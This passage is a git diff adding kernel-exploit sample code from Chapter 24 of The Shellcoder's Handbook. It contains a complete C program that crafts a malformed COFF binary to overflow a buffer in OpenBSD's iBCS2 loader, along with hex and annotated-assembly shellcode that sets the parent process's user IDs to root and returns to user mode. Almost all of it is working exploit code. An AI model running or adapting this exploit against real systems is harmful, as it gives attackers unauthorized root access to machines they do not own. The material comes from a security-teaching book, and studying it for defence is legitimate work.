+#include <unistd.h>
+#include <sys/param.h>
+#include <sys/sysctl.h>
+#include <sys/signal.h>
+
+/* kernel_sc.s shellcode */
+
+unsigned char shellcode[] =
+"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
+"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
+"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
+"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
+"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
+"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
+"\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
+"\x75\xef\x47\x31\xc0\x57\xc3";
+
+/* iret_sc.s */
+
+unsigned char iret_shellcode[] =
+"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
+"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
+"\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
+"\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
+"\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
+"\x6a\x17";
+
+unsigned char pusheip[] =
+"\x68\x00\x00\x00\x00"; /* fill eip */
+
+unsigned char iret[] =
+"\xcf";
+
+unsigned char exitsh[] =
+"\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */
+
+
+#define ZERO(p) memset(&p, 0x00, sizeof(p))
+
+/*
+ * COFF file header
+ */
+
+struct coff_filehdr {
+    u_short     f_magic;        /* magic number */
+    u_short     f_nscns;        /* # of sections */
+    long        f_timdat;       /* timestamp */
+    long        f_symptr;       /* file offset of symbol table */
+    long        f_nsyms;        /* # of symbol table entries */
+    u_short     f_opthdr;       /* size of optional header */
+    u_short     f_flags;        /* flags */
+};
+
+/* f_magic flags */
+#define COFF_MAGIC_I386 0x14c
+
+/* f_flags */
+#define COFF_F_RELFLG   0x1
+#define COFF_F_EXEC     0x2
+#define COFF_F_LNNO     0x4
+#define COFF_F_LSYMS    0x8
+#define COFF_F_SWABD    0x40
+#define COFF_F_AR16WR   0x80
+#define COFF_F_AR32WR   0x100
+
+/*
+ * COFF system header
+ */
+
+struct coff_aouthdr {
+    short       a_magic;
+    short       a_vstamp;
+    long        a_tsize;
+    long        a_dsize;
+    long        a_bsize;
+    long        a_entry;
+    long        a_tstart;
+    long        a_dstart;
+};
+
+/* magic */
+#define COFF_ZMAGIC     0413
+
+/*
+ * COFF section header
+ */
+
+struct coff_scnhdr {
+    char        s_name[8];
+    long        s_paddr;
+    long        s_vaddr;
+    long        s_size;
+    long        s_scnptr;
+    long        s_relptr;
+    long        s_lnnoptr;
+    u_short     s_nreloc;
+    u_short     s_nlnno;
+    long        s_flags;
+};
+
+/* s_flags */
+#define COFF_STYP_TEXT          0x20
+#define COFF_STYP_DATA          0x40
+#define COFF_STYP_SHLIB         0x800
+
+
+void get_proc(pid_t, struct kinfo_proc *);
+void sig_handler();
+
+int
+main(int argc, char **argv)
+{
+  u_int i, fd, debug = 0;
+  u_char *ptr, *shptr;
+  u_long *lptr;
+  u_long pprocadr, offset;
+  struct kinfo_proc kp;
+  char *args[] = { "./ibcs2own", NULL};
+  char *envs[] = { "RIP=theo", NULL};
+  //COFF structures
+  struct coff_filehdr fhdr;
+  struct coff_aouthdr ahdr;
+  struct coff_scnhdr  scn0, scn1, scn2;
+
+   if(argv[1]) {
+      if(!strncmp(argv[1], "-v", 2)) 
+              debug = 1;
+      else { 
+              printf("-v: verbose flag only\n");
+              exit(0);
+            }
+    }
+ 
+    ZERO(fhdr);
+    fhdr.f_magic = COFF_MAGIC_I386;
+    fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
+    fhdr.f_timdat = 0xdeadbeef;
+    fhdr.f_symptr = 0x4000;
+    fhdr.f_nsyms = 1;
+    fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
+    fhdr.f_flags = COFF_F_EXEC;
+
+    ZERO(ahdr);
+    ahdr.a_magic = COFF_ZMAGIC;
+    ahdr.a_tsize = 0;
+    ahdr.a_dsize = 0; 
+    ahdr.a_bsize = 0;
+    ahdr.a_entry = 0x10000;
+    ahdr.a_tstart = 0;
+    ahdr.a_dstart = 0;
+   
+    ZERO(scn0);
+    memcpy(&scn0.s_name, ".text", 5);
+    scn0.s_paddr = 0x10000;
+    scn0.s_vaddr = 0x10000;
+    scn0.s_size = 4096;
+    scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 
+    //file offset of .text segment
+    scn0.s_relptr = 0;
+    scn0.s_lnnoptr = 0;
+    scn0.s_nreloc = 0;
+    scn0.s_nlnno = 0;
+    scn0.s_flags = COFF_STYP_TEXT;
+
+    ZERO(scn1);
+    memcpy(&scn1.s_name, ".data", 5);
+    scn1.s_paddr = 0x10000 - 4096;
+    scn1.s_vaddr = 0x10000 - 4096;
+    scn1.s_size = 4096;
+    scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 
+    //file offset of .data segment
+    scn1.s_relptr = 0;
+    scn1.s_lnnoptr = 0;
+    scn1.s_nreloc = 0;
+    scn1.s_nlnno = 0;
+    scn1.s_flags = COFF_STYP_DATA;
+
+    ZERO(scn2);
+    memcpy(&scn2.s_name, ".shlib", 6);
+    scn2.s_paddr = 0;
+    scn2.s_vaddr = 0;
+    scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
+    scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 
+    //file offset of .data segment
+    scn2.s_relptr = 0;
+    scn2.s_lnnoptr = 0;
+    scn2.s_nreloc = 0;
+    scn2.s_nlnno = 0;
+    scn2.s_flags = COFF_STYP_SHLIB;
+
+    offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
+    ptr = (char *) malloc(offset);
+    if(!ptr) { 
+                perror("malloc");
+                exit(-1);
+    }
+
+    memset(ptr, 0xcc, offset);  /* fill int3 */
+
+    /* copy sections */
+    offset = 0;
+    memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
+    offset += sizeof(fhdr);
+
+    memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
+    offset += sizeof(ahdr);
+        
+    memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
+    offset += sizeof(scn0);
+
+    memcpy(ptr+offset, &scn1, sizeof(scn1));
+    offset += sizeof(scn1);
+
+    memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
+    offset += sizeof(scn2);
+
+    lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
+           (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);
+
+    shptr = (char *) malloc(4096);
+    if(!shptr) {
+                perror("malloc");
+                exit(-1);
+    }
+    if(debug)
+      printf("payload adr: 0x%.8x\t", shptr);
+
+    memset(shptr, 0xcc, 4096);
+
+    get_proc((pid_t) getppid(), &kp);
+    pprocadr = (u_long) kp.kp_eproc.e_paddr;
+    if(debug)
+      printf("parent proc adr: 0x%.8x\n", pprocadr); 
+
+    *lptr++ = 0xdeadbeef;
+    *lptr = (u_long) shptr;
+
+    shellcode[5] = pprocadr & 0xff;
+    shellcode[6] = (pprocadr >> 8) & 0xff;
+    shellcode[7] = (pprocadr >> 16) & 0xff;
+    shellcode[8] = (pprocadr >> 24) & 0xff;
+
+    memcpy(shptr, shellcode, sizeof(shellcode)-1);
+
+    unlink("./ibcs2own");
+    if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
+                perror("open");
+                exit(-1);
+        }
+
+    write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096*3);
+    close(fd);
+    free(ptr);
+
+    signal(SIGSEGV, (void (*)())sig_handler);
+    signal(SIGILL, (void (*)())sig_handler);
+    signal(SIGSYS, (void (*)())sig_handler);
+    signal(SIGBUS, (void (*)())sig_handler);
+    signal(SIGABRT, (void (*)())sig_handler);
+    signal(SIGTRAP, (void (*)())sig_handler);
+
+    printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
+    execve(args[0], args, envs);
+    perror("execve");
+}
+
+void
+sig_handler()
+{
+   _exit(0);
+}
+
+void
+get_proc(pid_t pid, struct kinfo_proc *kp)
+{
+   u_int arr[4], len;
+
+        arr[0] = CTL_KERN;
+        arr[1] = KERN_PROC;
+        arr[2] = KERN_PROC_PID;
+        arr[3] = pid;
+        len = sizeof(struct kinfo_proc);
+        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
+                perror("sysctl");
+                fprintf(stderr, "this is an unexpected error, re-run!\n");
+                exit(-1);
+        }
+
+}
diff --git a/Chapter_24/Shellcoders24sampleprogram01.txt b/Chapter_24/Shellcoders24sampleprogram01.txt
new file mode 100644
index 0000000..48a2ef3
--- /dev/null
+++ b/Chapter_24/Shellcoders24sampleprogram01.txt
@@ -0,0 +1,36 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+obsd_ex1.c
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+call moo
+.long 0x12345678   <-- pproc addr
+.long 0xdeadcafe
+.long 0xbeefdead
+nop
+nop
+nop
+moo:
+pop  %edi
+mov  (%edi),%ecx      # parent's proc addr in ecx
+
+                      # update p_ruid
+mov  0x10(%ecx),%ebx  # ebx = p->p_cred
+xor  %eax,%eax        # eax = 0
+mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0
+
+                      # update cr_uid
+mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred
+mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0
diff --git a/Chapter_24/Shellcoders24sampleprogram02.txt b/Chapter_24/Shellcoders24sampleprogram02.txt
new file mode 100644
index 0000000..1331375
--- /dev/null
+++ b/Chapter_24/Shellcoders24sampleprogram02.txt
@@ -0,0 +1,91 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+obsd_ex1.c
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+IDTVEC(syscall)
+        pushl   $2              # size of instruction for restart
+syscall1:
+        pushl   $T_ASTFLT       # trap # for doing ASTs
+        INTRENTRY
+        movl    _C_LABEL(cpl),%ebx
+        movl    TF_EAX(%esp),%esi       # syscall no
+[1]     call    _C_LABEL(syscall)
+2:      /* Check for ASTs on exit to user mode. */
+        cli
+        cmpb    $0,_C_LABEL(astpending)
+        je      1f
+        /* Always returning to user mode here. */
+        movb    $0,_C_LABEL(astpending)
+        sti
+        /* Pushed T_ASTFLT into tf_trapno on entry. */
+        call    _C_LABEL(trap)
+        jmp     2b
+1:      cmpl    _C_LABEL(cpl),%ebx
+        jne     3f
+[2]     INTRFASTEXIT
+
+#define INTRFASTEXIT \
+        popl    %es             ; \
+        popl    %ds             ; \
+        popl    %edi            ; \
+        popl    %esi            ; \
+        popl    %ebp            ; \
+        popl    %ebx            ; \
+        popl    %edx            ; \
+        popl    %ecx            ; \
+        popl    %eax            ; \
+        addl    $8,%esp         ; \
+        iret
+
+# no interrupts while switching to user mode cli
+# what 'bout if astpending is set ?
+# screw it! async traps will hopefully be served later
+
+# set up various selectors for user-land
+# es = ds = 0x1f
+pushl $0x1f
+popl  %es
+pushl $0x1f
+popl  %ds
+
+# esi = esi = 0x00
+pushl $0x00
+popl  %edi
+pushl $0x00
+popl  %esi
+
+# ebp = 0xdfbfd000
+pushl $0xdfbfd000
+popl  %ebp
+
+# ebx = edx = ecx = eax = 0x00
+pushl $0x00
+popl  %ebx
+pushl $0x00
+popl  %edx
+pushl $0x00
+popl  %ecx
+pushl $0x00
+popl  %eax
+
+pushl $0x1f             # ss = 0x1f
+pushl $0xdfbfd000       # esp  = 0xdfbfd000
+pushl $0x287            # eflags
+pushl $0x17             # cs user-land code segment selector
+
+# set set user mode instruction pointer in exploit code
+pushl $0x00000000       # empty slot for ring3 %eip
+iret